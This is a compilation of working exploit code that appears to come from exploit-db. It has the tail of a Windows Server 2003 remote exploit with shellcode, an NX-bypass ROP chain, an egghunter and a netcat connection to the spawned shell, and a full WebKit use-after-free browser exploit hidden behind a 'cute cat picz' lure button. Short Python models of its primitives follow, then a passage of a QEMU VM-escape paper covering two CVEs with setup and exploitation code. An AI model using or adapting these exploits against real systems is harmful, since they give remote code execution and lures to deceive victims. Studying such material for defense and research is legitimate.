buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"
buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"
buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"
buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"
buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"
buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"
buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"
buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"
buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"
buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"
buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"
buf += "\xc4\x25\x3d\xe9"

# NX disable routine for Windows Server 2003 SP2
rop = "\x30\xdb\xc0\x71"   # push esp, pop ebp, retn ws_32.dll
rop += "\x45"*16
rop += "\xe9\x77\xc1\x77"  # push esp, pop ebp, retn 4 gdi32.dll
rop += "\x5d\x7a\x81\x7c"  # ret 20
rop += "\x71\x42\x38\x77"  # jmp esp
rop += "\xf6\xe7\xbd\x77"  # add esp,2c ; retn msvcrt.dll
rop += "\x90"*2 + egghunter + "\x90"*42
rop += "\x17\xf5\x83\x7c"  # Disable NX routine
rop += "\x90"*4

stub = "\x21\x00\x00\x00\x10\x27\x00\x00\x30\x07\x00\x00\x00\x40\x51\x06\x04\x00\x00\x00\x00\x85\x57\x01\x30\x07\x00\x00\x08\x00\x00\x00"  # Magic bytes
stub += "\x41"*20 + rop + "\xCC"*100 + "w00tw00t" + buf + "\x42"*(1313-20-len(rop)-100-8-len(buf))
stub += "\x12"  # Magic byte
stub += "\x46"*522
stub += "\x04\x00\x00\x00\x00\x00\x00\x00"  # Magic bytes

dce.call(0x1d, stub)  # 0x1d MIBEntryGet (vulnerable function)
print "[-]Exploit sent to target successfully..."
print "Waiting for shell..."
time.sleep(5)
os.system("nc " + target + " 4444")

Source: https://www.exploit-db.com/exploits/41929/
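The egghunter in the exploit above scans memory for the doubled tag w00tw00t (the shellcode buf is placed right after the "w00tw00t" marker in the stub) and jumps to whatever follows it. Its search logic, modelled in Python:

```python
def find_egg(mem, tag=b"w00t"):
    # The hunter matches the 4-byte tag twice in a row (two scasd hits),
    # so a lone "w00t" is skipped and only "w00tw00t" counts.
    i = mem.find(tag + tag)
    return None if i < 0 else i + 2 * len(tag)  # execution resumes here

mem = b"\x90" * 64 + b"w00t" + b"\x90" * 8 + b"w00tw00t" + b"\xcc" * 16
assert find_egg(mem) == 84  # first byte after the doubled tag
```

Requiring the tag twice is what lets the hunter skip over its own copy of the tag bytes while sweeping the address space.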
-
<!-- Sources: https://phoenhex.re/2017-05-04/pwn2own17-cachedcall-uaf https://github.com/phoenhex/files/blob/master/exploits/cachedcall-uaf.html Overview The WebKit bug we used at Pwn2Own is CVE-2017-2491 / ZDI-17-231, a use-after-free of a JSString object in JavaScriptCore. By triggering it, we can obtain a dangling pointer to a JSString object in a JavaScript callback. At first, the specific scenario seems very hard to exploit, but we found a rather generic technique to still get a reliable read/write primitive out of it, although it requires a very large (~28 GiB) heap spray. This is possible even on a MacBook with 8 GB of RAM thanks to the page compression mechanism in macOS. --> <script> function make_compiled_function() { function target(x) { return x*5 + x - x*x; } // Call only once so that function gets compiled with low level interpreter // but none of the optimizing JITs target(0); return target; } function pwn() { var haxs = new Array(0x100); for (var i = 0; i < 0x100; ++i) haxs[i] = new Uint8Array(0x100); // hax is surrounded by other Uint8Array instances. Thus *(&hax - 8) == 0x100, // which is the butterfly length if hax is later used as a butterfly for a // fake JSArray. var hax = haxs[0x80]; var hax2 = haxs[0x81]; var target_func = make_compiled_function(); // Small helper to avoid allocations with .set(), so we don't mess up the heap function set(p, i, a,b,c,d,e,f,g,h) { p[i+0]=a; p[i+1]=b; p[i+2]=c; p[i+3]=d; p[i+4]=e; p[i+5]=f; p[i+6]=g; p[i+7]=h; } function spray() { var res = new Uint8Array(0x7ffff000); for (var i = 0; i < 0x7ffff000; i += 0x1000) { // Write heap pattern. // We only need a structure pointer every 128 bytes, but also some of // structure fields need to be != 0 and I can't remember which, so we just // write pointers everywhere. for (var j = 0; j < 0x1000; j += 8) set(res, i + j, 0x08, 0, 0, 0x50, 0x01, 0, 0, 0); // Write the offset to the beginning of each page so we know later // with which part we overlap. 
      var j = i+1+2*8;
      set(res, j, j&0xff, (j>>8)&0xff, (j>>16)&0xff, (j>>24)&0xff, 0, 0, 0xff, 0xff);
    }
    return res;
  }

  // Spray ~14 GiB worth of array buffers with our pattern.
  var x = [
    spray(), spray(), spray(), spray(),
    spray(), spray(), spray(), spray(),
  ];

  // The butterfly of our fake object will point to 0x200000001. This will always
  // be inside the second sprayed buffer.
  var buf = x[1];

  // A big array to hold references to objects we don't want to be freed.
  var ary = new Array(0x10000000);
  var cnt = 0;

  // Set up objects we need to trigger the bug.
  var n = 0x40000;
  var m = 10;
  var regex = new RegExp("(ab)".repeat(n), "g");
  var part = "ab".repeat(n);
  var s = (part + "|").repeat(m);

  // Set up some views to convert pointers to doubles
  var convert = new ArrayBuffer(0x20);
  var cu = new Uint8Array(convert);
  var cf = new Float64Array(convert);

  // Construct fake JSCell header
  set(cu, 0,
      0,0,0,0,  // structure ID
      8,        // indexing type
      0,0,0);   // some more stuff we don't care about

  var container = {
    // Inline object with indexing type 8 and butterfly pointing to hax.
    // Later we will refer to it as fakearray.
    jsCellHeader: cf[0],
    butterfly: hax,
  };

  while (1) {
    // Try to trigger bug
    s.replace(regex, function() {
      for (var i = 1; i < arguments.length-2; ++i) {
        if (typeof arguments[i] === 'string') {
          // Root all the callback arguments to force GC at some point
          ary[cnt++] = arguments[i];
          continue;
        }
        var a = arguments[i];

        // a.butterfly points to 0x200000001, which is always
        // inside buf, but we are not sure what the exact
        // offset is within it so we read a marker value.
        var offset = a[2];

        // Compute addrof(container) + 16. We write to the fake array, then
        // read from a sprayed array buffer on the heap.
        a[2] = container;
        var addr = 0;
        for (var j = 7; j >= 0; --j)
          addr = addr*0x100 + buf[offset + j];

        // Add 16 to get address of inline object
        addr += 16;

        // Do the inverse to get fakeobj(addr)
        for (var j = 0; j < 8; ++j) {
          buf[offset + j] = addr & 0xff;
          addr /= 0x100;
        }
        var fakearray = a[2];

        // Re-write the vector pointer of hax to point to hax2.
        fakearray[2] = hax2;

        // At this point hax.vector points to hax2, so we can write
        // the vector pointer of hax2 by writing to hax[16+{0..7}]

        // Leak address of JSFunction
        a[2] = target_func;
        addr = 0;
        for (var j = 7; j >= 0; --j)
          addr = addr*0x100 + buf[offset + j];

        // Follow a bunch of pointers to RWX location containing the
        // function's compiled code
        addr += 3*8;
        for (var j = 0; j < 8; ++j) {
          hax[16+j] = addr & 0xff;
          addr /= 0x100;
        }
        addr = 0;
        for (var j = 7; j >= 0; --j)
          addr = addr*0x100 + hax2[j];
        addr += 3*8;
        for (var j = 0; j < 8; ++j) {
          hax[16+j] = addr & 0xff;
          addr /= 0x100;
        }
        addr = 0;
        for (var j = 7; j >= 0; --j)
          addr = addr*0x100 + hax2[j];
        addr += 4*8;
        for (var j = 0; j < 8; ++j) {
          hax[16+j] = addr & 0xff;
          addr /= 0x100;
        }
        addr = 0;
        for (var j = 7; j >= 0; --j)
          addr = addr*0x100 + hax2[j];

        // Write shellcode
        for (var j = 0; j < 8; ++j) {
          hax[16+j] = addr & 0xff;
          addr /= 0x100;
        }
        hax2[0] = 0xcc;
        hax2[1] = 0xcc;
        hax2[2] = 0xcc;

        // Pwn.
        target_func();
      }
      return "x";
    });
  }
}
</script>

<button onclick="pwn()">click here for cute cat picz!</button>

Source: https://www.exploit-db.com/exploits/41964/
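The repeated byte loops in the exploit above are plain little-endian pointer (de)serialisation through the Uint8Array views; the same two primitives written out in Python:

```python
def read_ptr(buf, off):
    # addr = addr*0x100 + buf[off+j] for j = 7..0, as in the JS leak loops
    addr = 0
    for j in range(7, -1, -1):
        addr = addr * 0x100 + buf[off + j]
    return addr

def write_ptr(buf, off, addr):
    # inverse loop: store the low byte, shift right, eight times
    for j in range(8):
        buf[off + j] = addr & 0xff
        addr >>= 8

buf = bytearray(16)
write_ptr(buf, 4, 0x7f18bc01c000)
assert read_ptr(buf, 4) == 0x7f18bc01c000
```

The JS version divides by 0x100 instead of shifting because JavaScript numbers are doubles; that stays exact for pointer values below 2^53.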
-
|=-----------------------------------------------------------------------=|
|=----------------------------=[ VM escape ]=----------------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[ QEMU Case Study ]=-------------------------=|
|=-----------------------------------------------------------------------=|
|=---------------------------=[ Mehdi Talbi ]=---------------------------=|
|=--------------------------=[ Paul Fariello ]=--------------------------=|
|=-----------------------------------------------------------------------=|

--[ Table of contents

1 - Introduction
2 - KVM/QEMU Overview
    2.1 - Workspace Environment
    2.2 - QEMU Memory Layout
    2.3 - Address Translation
3 - Memory Leak Exploitation
    3.1 - The Vulnerable Code
    3.2 - Setting up the Card
    3.3 - Exploit
4 - Heap-based Overflow Exploitation
    4.1 - The Vulnerable Code
    4.2 - Setting up the Card
    4.3 - Reversing CRC
    4.4 - Exploit
5 - Putting All Together
    5.1 - RIP Control
    5.2 - Interactive Shell
    5.3 - VM-Escape Exploit
    5.4 - Limitations
6 - Conclusions
7 - Greets
8 - References
9 - Source Code

--[ 1 - Introduction

Virtual machines are nowadays heavily deployed for personal use or within
the enterprise segment. Network security vendors use, for instance,
different VMs to analyze malware in a controlled and confined environment.
A natural question arises: can the malware escape from the VM and execute
code on the host machine?

Last year, Jason Geffner from CrowdStrike reported a serious bug in QEMU
affecting the virtual floppy drive code that could allow an attacker to
escape from the VM [1] to the host. Even if this vulnerability has received
considerable attention in the netsec community - probably because it has a
dedicated name (VENOM) - it wasn't the first of its kind.

In 2011, Nelson Elhage [2] reported and successfully exploited a
vulnerability in QEMU's emulation of PCI device hotplugging. The exploit is
available at [3].
Recently, Xu Liu and Shengping Wang, from Qihoo 360, showcased at HITB 2016
a successful exploit on KVM/QEMU. They exploited two vulnerabilities
(CVE-2015-5165 and CVE-2015-7504) present in two different network card
device emulator models, namely, RTL8139 and PCNET. During their
presentation, they outlined the main steps towards code execution on the
host machine but didn't provide any exploit or the technical details to
reproduce it.

In this paper, we provide an in-depth analysis of CVE-2015-5165 (a
memory-leak vulnerability) and CVE-2015-7504 (a heap-based overflow
vulnerability), along with working exploits. The combination of these two
exploits makes it possible to break out from a VM and execute code on the
target host. We discuss the technical details required to exploit the
vulnerabilities in QEMU's network card device emulation, and provide
generic techniques that could be re-used to exploit future bugs in QEMU.
For instance, an interactive bindshell that leverages shared memory areas
and shared code.

--[ 2 - KVM/QEMU Overview

KVM (Kernel-based Virtual Machine) is a kernel module that provides a full
virtualization infrastructure for user space programs. It allows one to run
multiple virtual machines running unmodified Linux or Windows images. The
user space component of KVM is included in mainline QEMU (Quick Emulator),
which notably handles device emulation.

----[ 2.1 - Workspace Environment

In an effort to make things easier for those who want to use the sample
code given throughout this paper, we provide here the main steps to
reproduce our development environment.

Since the vulnerabilities we are targeting have already been patched, we
need to check out the QEMU source repository and switch to the commit that
precedes the fix for these vulnerabilities.
Then, we configure QEMU only for the x86_64 target and enable debugging:

$ git clone git://git.qemu-project.org/qemu.git
$ cd qemu
$ git checkout bd80b59
$ mkdir -p bin/debug/native
$ cd bin/debug/native
$ ../../../configure --target-list=x86_64-softmmu --enable-debug \
$     --disable-werror
$ make

In our testing environment, we build QEMU using version 4.9.2 of GCC.

For the rest, we assume that the reader already has a Linux x86_64 image
that can be run with the following command line:

$ ./qemu-system-x86_64 -enable-kvm -m 2048 -display vnc=:89 \
$     -netdev user,id=t0, -device rtl8139,netdev=t0,id=nic0 \
$     -netdev user,id=t1, -device pcnet,netdev=t1,id=nic1 \
$     -drive file=<path_to_image>,format=qcow2,if=ide,cache=writeback

We allocate 2 GB of memory and create two network interface cards: RTL8139
and PCNET. We are running QEMU on a Debian 7 machine with a 3.16 kernel on
the x86_64 architecture.

----[ 2.2 - QEMU Memory Layout

The physical memory allocated for the guest is actually an mmap'ed private
region in the virtual address space of QEMU. It's important to note that
the PROT_EXEC flag is not enabled while allocating the physical memory of
the guest.

The following figure illustrates how the guest's memory and the host's
memory cohabit:

                            Guest's processes
                         +--------------------+
    Virtual addr space   |                    |
                         +--------------------+
                         |                    |
                         \__   Page Table     \__
                            \                    \
                             |                    |  Guest kernel
                        +----+--------------------+----------------+
    Guest's phy. memory |    |                    |                |
                        +----+--------------------+----------------+
                        |                                          |
                        \__                                        \__
                           \                                          \
                            |              QEMU process               |
                       +----+------------------------------------------+
    Virtual addr space |    |                                          |
                       +----+------------------------------------------+
                       |                                               |
                       \__   Page Table                                \__
                          \                                               \
                           |                                               |
                      +----+-----------------------------------------------++
    Physical memory   |    |                                               ||
                      +----+-----------------------------------------------++

Additionally, QEMU reserves a memory region for the BIOS and ROM.
These mappings are available in QEMU's maps file:

7f1824ecf000-7f1828000000 rw-p 00000000 00:00 0
7f1828000000-7f18a8000000 rw-p 00000000 00:00 0        [2 GB of RAM]
7f18a8000000-7f18a8992000 rw-p 00000000 00:00 0
7f18a8992000-7f18ac000000 ---p 00000000 00:00 0
7f18b5016000-7f18b501d000 r-xp 00000000 fd:00 262489   [first shared lib]
7f18b501d000-7f18b521c000 ---p 00007000 fd:00 262489       ...
7f18b521c000-7f18b521d000 r--p 00006000 fd:00 262489       ...
7f18b521d000-7f18b521e000 rw-p 00007000 fd:00 262489       ...
...                                                    [more shared libs]
7f18bc01c000-7f18bc5f4000 r-xp 00000000 fd:01 30022647 [qemu-system-x86_64]
7f18bc7f3000-7f18bc8c1000 r--p 005d7000 fd:01 30022647     ...
7f18bc8c1000-7f18bc943000 rw-p 006a5000 fd:01 30022647     ...
7f18bd328000-7f18becdd000 rw-p 00000000 00:00 0        [heap]
7ffded947000-7ffded968000 rw-p 00000000 00:00 0        [stack]
7ffded968000-7ffded96a000 r-xp 00000000 00:00 0        [vdso]
7ffded96a000-7ffded96c000 r--p 00000000 00:00 0        [vvar]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]

A more detailed explanation of memory management in virtualized
environments can be found at [4].

----[ 2.3 - Address Translation

Within QEMU there exist two translation layers:

- From a guest virtual address to a guest physical address. In our exploit,
  we need to configure network card devices that require DMA access. For
  example, we need to provide the physical addresses of Tx/Rx buffers to
  correctly configure the network card devices.

- From a guest physical address to QEMU's virtual address space. In our
  exploit, we need to inject fake structures and get their precise address
  in QEMU's virtual address space.

On x64 systems, a virtual address is made of a page offset (bits 0-11) and
a page number. On Linux systems, the pagemap file enables a userspace
process with CAP_SYS_ADMIN privileges to find out which physical frame each
virtual page is mapped to.
The pagemap file contains for each virtual page a 64-bit value documented
at kernel.org [5]:

    - Bits 0-54  : physical frame number if present.
    - Bit  55    : page table entry is soft-dirty.
    - Bit  56    : page exclusively mapped.
    - Bits 57-60 : zero
    - Bit  61    : page is file-page or shared-anon.
    - Bit  62    : page is swapped.
    - Bit  63    : page is present.

To convert a virtual address to a physical one, we rely on Nelson Elhage's
code [3]. The following program allocates a buffer, fills it with the
string "Where am I?" and prints its physical address:

---[ mmu.c ]---
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <assert.h>
#include <inttypes.h>

#define PAGE_SHIFT  12
#define PAGE_SIZE   (1 << PAGE_SHIFT)
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN     ((1ull << 55) - 1)

int fd;

uint32_t page_offset(uint32_t addr)
{
    return addr & ((1 << PAGE_SHIFT) - 1);
}

uint64_t gva_to_gfn(void *addr)
{
    uint64_t pme, gfn;
    size_t offset;
    offset = ((uintptr_t)addr >> 9) & ~7;
    lseek(fd, offset, SEEK_SET);
    read(fd, &pme, 8);
    if (!(pme & PFN_PRESENT))
        return -1;
    gfn = pme & PFN_PFN;
    return gfn;
}

uint64_t gva_to_gpa(void *addr)
{
    uint64_t gfn = gva_to_gfn(addr);
    assert(gfn != -1);
    return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}

int main()
{
    uint8_t *ptr;
    uint64_t ptr_mem;

    fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0) {
        perror("open");
        exit(1);
    }

    ptr = malloc(256);
    strcpy(ptr, "Where am I?");
    printf("%s\n", ptr);
    ptr_mem = gva_to_gpa(ptr);
    printf("Your physical address is at 0x%"PRIx64"\n", ptr_mem);

    getchar();
    return 0;
}

If we run the above code inside the guest and attach gdb to the QEMU
process, we can see that our buffer is located within the physical address
space allocated for the guest. More precisely, we note that the printed
address is actually an offset from the base address of the guest's
physical memory:

root@debian:~# ./mmu
Where am I?
Your physical address is at 0x78b0d010 (gdb) info proc mappings process 14791 Mapped address spaces: Start Addr End Addr Size Offset objfile 0x7fc314000000 0x7fc314022000 0x22000 0x0 0x7fc314022000 0x7fc318000000 0x3fde000 0x0 0x7fc319dde000 0x7fc31c000000 0x2222000 0x0 0x7fc31c000000 0x7fc39c000000 0x80000000 0x0 ... (gdb) x/s 0x7fc31c000000 + 0x78b0d010 0x7fc394b0d010: "Where am I?" --[ 3 - Memory Leak Exploitation In the following, we will exploit CVE-2015-5165 - a memory leak vulnerability that affects the RTL8139 network card device emulator - in order to reconstruct the memory layout of QEMU. More precisely, we need to leak (i) the base address of the .text segment in order to build our shellcode and (ii) the base address of the physical memory allocated for the guest in order to be able to get the precise address of some injected dummy structures. ----[ 3.1 - The vulnerable Code The REALTEK network card supports two receive/transmit operation modes: C mode and C+ mode. When the card is set up to use C+, the NIC device emulator miscalculates the length of IP packet data and ends up sending more data than actually available in the packet. 
The vulnerability is present in the rtl8139_cplus_transmit_one function from hw/net/rtl8139.c: /* ip packet header */ ip_header *ip = NULL; int hlen = 0; uint8_t ip_protocol = 0; uint16_t ip_data_len = 0; uint8_t *eth_payload_data = NULL; size_t eth_payload_len = 0; int proto = be16_to_cpu(*(uint16_t *)(saved_buffer + 12)); if (proto == ETH_P_IP) { DPRINTF("+++ C+ mode has IP packet\n"); /* not aligned */ eth_payload_data = saved_buffer + ETH_HLEN; eth_payload_len = saved_size - ETH_HLEN; ip = (ip_header*)eth_payload_data; if (IP_HEADER_VERSION(ip) != IP_HEADER_VERSION_4) { DPRINTF("+++ C+ mode packet has bad IP version %d " "expected %d\n", IP_HEADER_VERSION(ip), IP_HEADER_VERSION_4); ip = NULL; } else { hlen = IP_HEADER_LENGTH(ip); ip_protocol = ip->ip_p; ip_data_len = be16_to_cpu(ip->ip_len) - hlen; } } The IP header contains two fields hlen and ip->ip_len that represent the length of the IP header (20 bytes considering a packet without options) and the total length of the packet including the ip header, respectively. As shown at the end of the snippet of code given below, there is no check to ensure that ip->ip_len >= hlen while computing the length of IP data (ip_data_len). As the ip_data_len field is encoded as unsigned short, this leads to sending more data than actually available in the transmit buffer. 
More precisely, ip_data_len is later used to compute the length of the TCP
data that is copied - chunk by chunk if the data exceeds the size of the
MTU - into a malloc'ed buffer:

int tcp_data_len = ip_data_len - tcp_hlen;
int tcp_chunk_size = ETH_MTU - hlen - tcp_hlen;

int is_last_frame = 0;

for (tcp_send_offset = 0; tcp_send_offset < tcp_data_len;
     tcp_send_offset += tcp_chunk_size)
{
    uint16_t chunk_size = tcp_chunk_size;

    /* check if this is the last frame */
    if (tcp_send_offset + tcp_chunk_size >= tcp_data_len) {
        is_last_frame = 1;
        chunk_size = tcp_data_len - tcp_send_offset;
    }

    memcpy(data_to_checksum, saved_ip_header + 12, 8);

    if (tcp_send_offset) {
        memcpy((uint8_t*)p_tcp_hdr + tcp_hlen,
               (uint8_t*)p_tcp_hdr + tcp_hlen + tcp_send_offset,
               chunk_size);
    }

    /* more code follows */
}

So, if we forge a malformed packet with a corrupted length field (e.g.
ip->ip_len = hlen - 1), then we can leak approximately 64 KB from QEMU's
heap memory. Instead of sending a single packet, the network card device
emulator will end up sending 43 fragmented packets.

----[ 3.2 - Setting up the Card

In order to send our malformed packet and read the leaked data, we first
need to configure Rx and Tx descriptor buffers on the card, and set up some
flags so that our packet flows through the vulnerable code path.

The figure below shows the RTL8139 registers. We will not detail all of
them but only those which are relevant to our exploit:

     +---------------------------+----------------------------+
0x00 |           MAC0            |            MAR0            |
     +---------------------------+----------------------------+
0x10 |                       TxStatus0                        |
     +--------------------------------------------------------+
0x20 |                        TxAddr0                         |
     +-------------------+-------+----------------------------+
0x30 |       RxBuf       |ChipCmd|                            |
     +-------------+------+------+----------------------------+
0x40 |  TxConfig   |  RxConfig   |            ...
| +-------------+-------------+----------------------------+ | | | skipping irrelevant registers | | | +---------------------------+--+------+------------------+ 0xd0 | ... | |TxPoll| ... | +-------+------+------------+--+------+--+---------------+ 0xe0 | CpCmd | ... |RxRingAddrLO|RxRingAddrHI| ... | +-------+------+------------+------------+---------------+ - TxConfig: Enable/disable Tx flags such as TxLoopBack (enable loopback test mode), TxCRC (do not append CRC to Tx Packets), etc. - RxConfig: Enable/disable Rx flags such as AcceptBroadcast (accept broadcast packets), AcceptMulticast (accept multicast packets), etc. - CpCmd: C+ command register used to enable some functions such as CplusRxEnd (enable receive), CplusTxEnd (enable transmit), etc. - TxAddr0: Physical memory address of Tx descriptors table. - RxRingAddrLO: Low 32-bits physical memory address of Rx descriptors table. - RxRingAddrHI: High 32-bits physical memory address of Rx descriptors table. - TxPoll: Tell the card to check Tx descriptors. A Rx/Tx-descriptor is defined by the following structure where buf_lo and buf_hi are low 32 bits and high 32 bits physical memory address of Tx/Rx buffers, respectively. These addresses point to buffers holding packets to be sent/received and must be aligned on page size boundary. The variable dw0 encodes the size of the buffer plus additional flags such as the ownership flag to denote if the buffer is owned by the card or the driver. struct rtl8139_desc { uint32_t dw0; uint32_t dw1; uint32_t buf_lo; uint32_t buf_hi; }; The network card is configured through in*() out*() primitives (from sys/io.h). We need to have CAP_SYS_RAWIO privileges to do so. The following snippet of code configures the card and sets up a single Tx descriptor. 
#define RTL8139_PORT        0xc000
#define RTL8139_BUFFER_SIZE 1500

struct rtl8139_desc desc;
void *rtl8139_tx_buffer;
uint32_t phy_mem;

rtl8139_tx_buffer = aligned_alloc(PAGE_SIZE, RTL8139_BUFFER_SIZE);
phy_mem = (uint32)gva_to_gpa(rtl8139_tx_buffer);

memset(&desc, 0, sizeof(struct rtl8139_desc));

desc.dw0 |= CP_TX_OWN | CP_TX_EOR | CP_TX_LS | CP_TX_LGSEN |
            CP_TX_IPCS | CP_TX_TCPCS;
desc.dw0 += RTL8139_BUFFER_SIZE;

desc.buf_lo = phy_mem;

iopl(3);

outl(TxLoopBack, RTL8139_PORT + TxConfig);
outl(AcceptMyPhys, RTL8139_PORT + RxConfig);

outw(CPlusRxEnb|CPlusTxEnb, RTL8139_PORT + CpCmd);
outb(CmdRxEnb|CmdTxEnb, RTL8139_PORT + ChipCmd);

outl(phy_mem, RTL8139_PORT + TxAddr0);
outl(0x0, RTL8139_PORT + TxAddr0 + 0x4);

----[ 3.3 - Exploit

The full exploit (cve-2015-5165.c) is available inside the attached source
code tarball. The exploit configures the required registers on the card and
sets up Tx and Rx buffer descriptors. Then it forges a malformed IP packet
addressed to the MAC address of the card. This enables us to read the
leaked data by accessing the configured Rx buffers.

While analyzing the leaked data, we have observed that several function
pointers are present. A closer look reveals that these function pointers
are all members of the same QEMU internal structure:

typedef struct ObjectProperty
{
    gchar *name;
    gchar *type;
    gchar *description;
    ObjectPropertyAccessor *get;
    ObjectPropertyAccessor *set;
    ObjectPropertyResolve *resolve;
    ObjectPropertyRelease *release;
    void *opaque;

    QTAILQ_ENTRY(ObjectProperty) node;
} ObjectProperty;

QEMU follows an object model to manage devices, memory regions, etc. At
startup, QEMU creates several objects and assigns properties to them. For
example, the following call adds a "may-overlap" property to a memory
region object.
This property is endowed with a getter method to retrieve the value of this
boolean property:

object_property_add_bool(OBJECT(mr), "may-overlap",
                         memory_region_get_may_overlap,
                         NULL, /* memory_region_set_may_overlap */
                         &error_abort);

The RTL8139 network card device emulator reserves 64 KB on the heap to
reassemble packets. There is a large chance that this allocated buffer fits
in the space left free by destroyed object properties. In our exploit, we
search for known object properties in the leaked memory. More precisely, we
are looking for 80-byte memory chunks (the chunk size of a free'd
ObjectProperty structure) where at least one of the function pointers is
set (get, set, resolve or release).

Even if these addresses are subject to ASLR, we can still guess the base
address of the .text section. Indeed, their page offsets are fixed (the 12
least significant bits of virtual addresses are not randomized). We can do
some arithmetic to get the addresses of some of QEMU's useful functions. We
can also derive the addresses of some libc functions such as mprotect() and
system() from their PLT entries.

We have also noticed that the address PHY_MEM + 0x78 is leaked several
times, where PHY_MEM is the start address of the physical memory allocated
for the guest.

The current exploit searches the leaked memory and tries to resolve (i) the
base address of the .text segment and (ii) the base address of the physical
memory.

--[ 4 - Heap-based Overflow Exploitation

This section discusses the vulnerability CVE-2015-7504 and provides an
exploit that gets control over the %rip register.

----[ 4.1 - The vulnerable Code

The AMD PCNET network card emulator is vulnerable to a heap-based overflow
when large-size packets are received in loopback test mode. The PCNET
device emulator reserves a buffer of 4 kB to store packets.
If the ADDFCS flag is enabled on the Tx descriptor buffer, the card appends
a CRC to received packets, as shown in the following snippet of code from
the pcnet_receive() function in hw/net/pcnet.c. This does not pose a
problem if the size of the received packet is less than 4096 - 4 bytes.
However, if the packet is exactly 4096 bytes, then we can overflow the
destination buffer by 4 bytes.

uint8_t *src = s->buffer;
/* ... */
if (!s->looptest) {
    memcpy(src, buf, size);
    /* no need to compute the CRC */
    src[size] = 0;
    src[size + 1] = 0;
    src[size + 2] = 0;
    src[size + 3] = 0;
    size += 4;
} else if (s->looptest == PCNET_LOOPTEST_CRC ||
           !CSR_DXMTFCS(s) || size < MIN_BUF_SIZE+4) {
    uint32_t fcs = ~0;
    uint8_t *p = src;

    while (p != &src[size])
        CRC(fcs, *p++);
    *(uint32_t *)p = htonl(fcs);
    size += 4;
}

In the above code, s points to the PCNET main structure, where we can see
that beyond our vulnerable buffer, we can corrupt the value of the irq
variable:

struct PCNetState_st {
    NICState *nic;
    NICConf conf;
    QEMUTimer *poll_timer;
    int rap, isr, lnkst;
    uint32_t rdra, tdra;
    uint8_t prom[16];
    uint16_t csr[128];
    uint16_t bcr[32];
    int xmit_pos;
    uint64_t timer;
    MemoryRegion mmio;
    uint8_t buffer[4096];
    qemu_irq irq;
    void (*phys_mem_read)(void *dma_opaque, hwaddr addr,
                          uint8_t *buf, int len, int do_bswap);
    void (*phys_mem_write)(void *dma_opaque, hwaddr addr,
                           uint8_t *buf, int len, int do_bswap);
    void *dma_opaque;
    int tx_busy;
    int looptest;
};

The variable irq is a pointer to an IRQState structure that represents a
handler to execute:

typedef void (*qemu_irq_handler)(void *opaque, int n, int level);

struct IRQState {
    Object parent_obj;
    qemu_irq_handler handler;
    void *opaque;
    int n;
};

This handler is called several times by the PCNET card emulator.
For instance, at the end of the pcnet_receive() function, there is a
call to pcnet_update_irq() which in turn calls qemu_set_irq():

    void qemu_set_irq(qemu_irq irq, int level)
    {
        if (!irq)
            return;
        irq->handler(irq->opaque, irq->n, level);
    }

So, to exploit this vulnerability we need to:

  - allocate a fake IRQState structure with a handler to execute
    (e.g. system()).

  - compute the precise address of this allocated fake structure.
    Thanks to the previous memory leak, we know exactly where our fake
    structure resides in QEMU's process memory (at some offset from the
    base address of the guest's physical memory).

  - forge a malicious 4 kB packet.

  - patch the packet so that the CRC computed over it matches the
    address of our fake IRQState structure.

  - send the packet.

When this packet is received by the PCNET card, it is handled by the
pcnet_receive() function, which performs the following actions:

  - copies the content of the received packet into the buffer variable.

  - computes a CRC and appends it to the buffer. The buffer is
    overflowed by 4 bytes and the value of the irq variable is
    corrupted.

  - calls pcnet_update_irq(), which in turn calls qemu_set_irq() with
    the corrupted irq variable. Our handler is then executed.

Note that we control the first two parameters of the substituted
handler (irq->opaque and irq->n), but thanks to a little trick that we
will see later, we can get control over the third parameter too (the
level parameter). This will be necessary to call the mprotect()
function.

Note also that we corrupt an 8-byte pointer with 4 bytes. This is
sufficient in our testing environment to successfully get control over
the %rip register. However, it poses a problem with kernels compiled
without the CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE flag. This issue is
discussed in section 5.4.
----[ 4.2 - Setting up the Card

Before going further, we need to set up the PCNET card in order to
configure the required flags, set up the Tx and Rx descriptor buffers
and allocate ring buffers to hold the packets to transmit and receive.

The AMD PCNET card can be accessed in 16-bit or 32-bit mode. This
depends on the current value of DWIO (a value stored in the card). In
the following, we detail the main registers of the PCNET card in
16-bit access mode, as this is the default mode after a card reset:

     0                                16
     +----------------------------------+
     |              EPROM               |
     +----------------------------------+
     |     RDP - Data reg for CSR       |
     +----------------------------------+
     |  RAP - Index reg for CSR and BCR |
     +----------------------------------+
     |            Reset reg             |
     +----------------------------------+
     |      BDP - Data reg for BCR      |
     +----------------------------------+

The card can be reset to its defaults by accessing the reset register.

The card has two types of internal registers: CSR (Control and Status
Register) and BCR (Bus Control Register). Both are accessed by first
setting the index of the register that we want to access in the RAP
(Register Address Port) register. For instance, if we want to init and
restart the card, we need to set bit0 and bit1 of register CSR0 to 1.
This can be done by writing 0 to the RAP register in order to select
register CSR0, then by setting CSR0 to 0x3:

    outw(0x0, PCNET_PORT + RAP);
    outw(0x3, PCNET_PORT + RDP);

The configuration of the card is done by filling an initialization
